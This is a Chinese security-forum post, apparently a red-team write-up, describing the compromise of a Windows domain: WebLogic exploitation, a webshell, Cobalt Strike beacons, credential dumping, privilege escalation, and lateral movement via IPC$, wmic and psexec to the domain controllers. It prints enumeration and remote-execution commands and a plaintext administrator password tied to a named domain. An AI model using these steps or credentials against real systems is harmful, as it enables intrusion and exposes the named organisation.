问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
记一次平平无奇有手就行的幸运域控
渗透测试
记一次平平无奇有手就行的幸运域控
0x00 前言 ------- 最近在学习内网渗透,很想找个机会练练手。正好团队接到红队评估的项目,于是便有了此文,没什么技术含量,师傅们轻点喷。 0x01外网打点 -------- 在外网打点的的时候,都是些小打小闹,没有拿到权限,很是苦恼,最后突然发现了这个站点,一下子坐了起来,直觉告诉我有戏 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-e1f9a1bb1afe21bba2b24de5ab14a7df98012324.png) Ps: 这里自己总结了一些Weblogic常见漏洞 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-a040c5addd81d7ac8339ffc47a54ef7c2c96ee98.png) Weblogic12存在 Wls9-async漏洞和 XMLDecoder漏洞,这里直接利用漏洞利用工具验证,漏洞存在。 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-bc7a5f12bb33b53bcf5cb77329ce4840779dd48b.png) 先简单看一下当前用户权限,当前为administrator权限 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-46dd340b0a81a075b7f6af179143c3ca44612260.png) 直接传个冰蝎上去看看 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-37760e98821e904cfc2b81f70802f9f59fb4455a.png) 冰蝎连上去,内网信息收集一波 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-f8173901e69b5dbc741e4ef2fa9152e11c254cb2.png) ```php 系统:Windows Server 2008 R2 Enterprise 域:berca.co.id ``` 当前主机是一台Windows Server 2008的机子,那我们就可以抓到明文密码,并且存在域环境。 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-97e63491e3d59619e30a67995ec9c3e68826563a.png) ```php IPv4 Address. . . . . . . . . . . : 192.168.10.22 Primary Dns Suffix . . . . . . . : berca.co.id DNS Suffix Search List. . . . . . : berca.co.id DNS Servers . . . . . . . . . . . : 192.168.15.187 192.168.15.180 ``` 收集到这里,通过DNS服务器初步判断,192.168.15.180、192.168.15.187这两台就是域控机器,后面也证实这两台就是域控机器。 再看一下进程列表,看一下是否存在杀软,就很棒,居然没有杀软 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-e3cd2101d31341a4e09d24cd12fde43e0b51257a.png) 查看域用户失败,提示权限不足 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-e47a2cd8bca33669c24e5731c8093b6d39f0fe39.png) ```php net user /domain //查看域用户 ``` 默认共享开启 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-7135cac61b69a859c6e965f690f65a67479d561d.png) ```php net share //查看默认共享 ``` 0x02上线CS -------- 后续想继续收集一些域信息,但是因为权限不足,所以干脆一不做二不休直接祭出内网大杀器CS,直接powershell一句话上线CS ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-af4b2b02a52430b87119e909b0bd01cace7e1d71.png) ### 域信息收集 内网存活主机扫描一波: ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-acb1919443e29083c036ac1ab0b558207ba583db.png) ```php net view /domain //查询域 ``` ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-1d6b84cb76b1e8807cacdcc94dda3b0be24d9a5f.png) ```php net view /domain:ROOT //查询ROOT域内所有机器 ``` ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-ca219e6087e27d1117fc332a5366e5554a7a43f5.png) ```php net group "domain computers" /domain //查询所有域成员计算机列表 ``` ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-04a425ebaa02364d755bc03f977cf82bd60a6021.png) 大概看了下,有好几百台机子,还不错。 ```php net time /domain //查询主域 ``` ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-b925eb523996cb422102dc31a97f6ac7257eee52.png) 域服务器通常也会作为时间服务器,主域:`\\ADBHPSRV.berca.co.id` ```php net group "Domain Controllers" /domain //查看域控列表 ``` ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-e257d62032423c0cf44bc014b3ab979ab5dead83.png) ```php Nslookup -type=SRV \_ldap.\_tcp //查看域控主机名 ``` ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-6cdb16dd117c33ed5ce0996891035b670690acf1.png) 得到两台域控的地址和主机名: ```php 192.168.15.187 adbhpsrv.berca.co.id 192.168.15.180 adbhpsrv02.berca.co.id ``` ```php net group "domain admins" /domain //查询域管 ``` ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-83a676689853f5251b4a106254d76854f9efe0dd.png) 域管还挺多,我们只要能拿到一个域管的权限,就可以在这个域内漫游了 ```php net accounts /domain //获取域密码信息 ``` ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-ead3089754852842c7b0d801b45103d89bdc1334.png) ```php nltest /domain\_trusts 获取域信任信息 ``` ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-4ef31f120815c5fa48548eab674acc64b9b6f922.png) ### 抓取hash 在内网渗透中,很多横向移动的方法都需要先获取用户的密码或者Hash值才能进行,比如哈希传递攻击、票据传递等等。 因为目标机是windows server 2008,所以直接抓到了明文密码: ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-4657a64383f80a2a96415713bcd806bad434bee0.png) 得到明文密码:`Administrator/Psft24680!!@@62##` ### 提权 因为当前是一个Administrator权限,当前主机补丁打得也比较少,所以这里尝试利用甜土豆提权到system,提权成功反弹回来一个system权限的会话 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-519ca7b3846e349cc186f10d684514c4aa7f8752.png) ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-c5847aaae04487f17f6ee38e956e51003c005d0f.png) 0x03横向移动 -------- ### IPC$横向 IPC$ 是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$可以与目标主机建立一个连接,利用这个连接,可以实现远程登陆及对默认共享的访问、访问目标机器的文件,上传、下载,也可以在目标机器上运行命令等。 #### 使用条件 • **管理员开启了默认共享** 默认共享是为了方便管理员远程管理而默认开启的共享,我们通过IPC连接可以实现对这些默认共享的访问。可以通过net share命令查看,前期信息收集时,就已经查看过当前主机是开启了默认共享的。 • **139、445端口开启** IPC连接需要139或445端口来支持,我们可以通过139和445端口来实现对共享文件/打印机的访问,IPC$连接默认会走445端口,不通的话会走139端口,这两个端口都可以单独实现文件共享。 当前主机满足上述IPC的利用条件,所以先尝试做IPC连接,发现10.23可以连接成功 ```php shell net use \\\\192.168.10.23\\ipc$ "Psft24680!!@@62##" /user:"Administrator" ``` ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-41d11381c4b900ef262800d1c368e5525e8d1a12.png) 然后在本机传个马,copy过去 ```php shell copy C:\\Windows\\Temp\\ma.exe \\\\192.168.10.23\\c$\\Windows\\Temp\\ma.exe ``` ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-b1204e7646dd86909c1323692d6ce2bc197e2827.png) 之后利用wmic远程执行 ```php shell wmic /node:192.168.10.23 /user:Administrator /password:Psft24680!!@@62## process call create "cmd.exe /c C:\\Windows\\Temp\\ma.exe" ``` 但是在我传过去之后机器久久未上线,远程获取进程发现也并无杀软,猜测目标机器不出网。 ### SMB Beacon SMB Beacon使用命名管道与父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,常用来绕防火墙有奇效。 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-351ebda65dc101d6c43b361640fdc874633759b8.png) #### 使用条件 • 具有SMB Beacon的主机必须接受端口445上的连接 • 只能链接由同一Cobalt Strike实例管理的Beacon 在域中,默认域用户是可以登录到除域控以外的所有主机。当我们得到其中一个域用户的账号密码,所以我们可以利用该域用户与其他主机建立IPC连接,然后让其他主机进行SMB Beacon上线,于是批量扫了下445开放的主机 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-305517c0bd83d7268dc3d4d4bd40aedeff6ed639.png) 这里扫到了10.23机器开放,前面IPC也是利用的它,这里试试用SMB Beacon让其上线。 #### 建立SMB Beacon监听 首先创建一个SMB Beacon的监听 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-20050d6f55bb80130ef3145dd5bb8b2386d6d5a6.png) #### psexec\_psh横向 建立好SMB Beacon监听,尝试进行横向,利用明文密码或者hash让机器上线SMB Beacon,这里利用的是psexec\_psh ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-a3882e0d7dc8dc55d27046abe3accf3ee8621cdf.png) ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-771d7e07fd2eee330a17fad905f1d96599cfaa36.png) 利用SMB Beacon成功上线后,后面就会有 ∞∞ 这个字符,这就是派生的SMB Beacon,之后再在这台机子抓hash ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-beafbf00ae595bdb3e7c543981a635030218a41a.png) ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-d9c0c88c213d88057625404fcef89793c57a3361.png) 然后重复操作10.18、10.19 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-162d5047f1a4ce9c8a5f1b33ae630129e2e309fa.png) ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-9a2b3a67c729aad15483fb196afc6f095c3d9f2a.png) 在横向18、19的时候发现了一个疑似域用户的,可以重复上面的IPC连接传马远程执行,或者用这个机子继续去smb横向 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-8bae5591e1ba883f42b5d42bf7d66ab819396b03.png) 当我成功横向24的时候发现了一个域管用户`sp\_farm`,并成功抓取到了明文密码 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-a02ce096ff57bbb85a55b3f7903e1fe139f2e117.png) ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-7e8202f00f562b0ab0bc717d6874a04bccd6e0cf.png) #### 域管上线 1\. 当抓到域管明文,可以直接利用CS的功能,切换用户上线 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-b814b2c0f831270699a946f0729ac72fb6206d9f.png) ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-5a1ac8fddf8e4bb91e7273e88cf5457d2ee4cc14.png) 2\. 如果没域管明文,可以查看当前机子是否有域管进程,注入域管进程上线 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-fb6a193fdd46ad20bbc04ad9feda5f5e8af20c4a.png) ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-25e323d8f879c5c56540dc44ddfb9eba1da521a1.png) 通过上述两种方式,都可以得到域管权限的回话 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-d567067ac0a11d2bf89e4a834e6c8423ef6e41fb.png) #### 横向域控 有了域管权限,就可以直接横向域控了,前期的信息收集我们知道域控都在15段,我们当前所有拿到的机子都是10段的,所以这里利用了CS的另一个功能,我们可以自己添加目标机器,这里直接把域控的IP和主机名都添加上,操作系统写ukonw就可以了 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-ecaba2b90561dae489d98670be31b9e821ad6979.png) ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-a511538eb46154afc57cf84dcb5b9c01914f83c9.png) 添加好域管主机后,扫描了一下域控机器是否开放了445端口 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-5f65dfd6dc12246128e9193a306bb4770576deb0.png) ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-89f01cbdd8525dbb01438006175792716abbe4ff.png) 发现都开放了445,之后就可以用域管权限的会话,或者域管权限的账户横向过去 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-63de8463382cc3dad9d967ef449ef0326f6504c1.png) ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-689d632c40ebbc108f7a681a52ac0ce56331ba4d.png) 横向成功,域控主机成功上线 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-6906a34a9198507c20396eb1028d5242bf57135d.png) 然后导出域内hash,全部拿下 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-b0af5a6229d4b7c9d6b89fa576f44b69c048a416.png) ![图片.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-c688c5cc6b72a2706deb888fbed0ecc9ac7d5e5a.png) 0x04 总结 ------- 内网渗透的思路、方法远远不止于此,本项目中用到的也只是很小的一部分,如果文中有错误,望大佬们斧正。 0x05 参考链接 --------- [https://github.com/aleenzz/Cobalt\\\_Strike\\\_wiki/](https://github.com/aleenzz/Cobalt%5C_Strike%5C_wiki/)
发表于 2023-02-07 10:41:10
阅读 ( 10196 )
分类:
内网渗透
7 推荐
收藏
0 条评论
请先
登录
后评论
F1ne
4 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!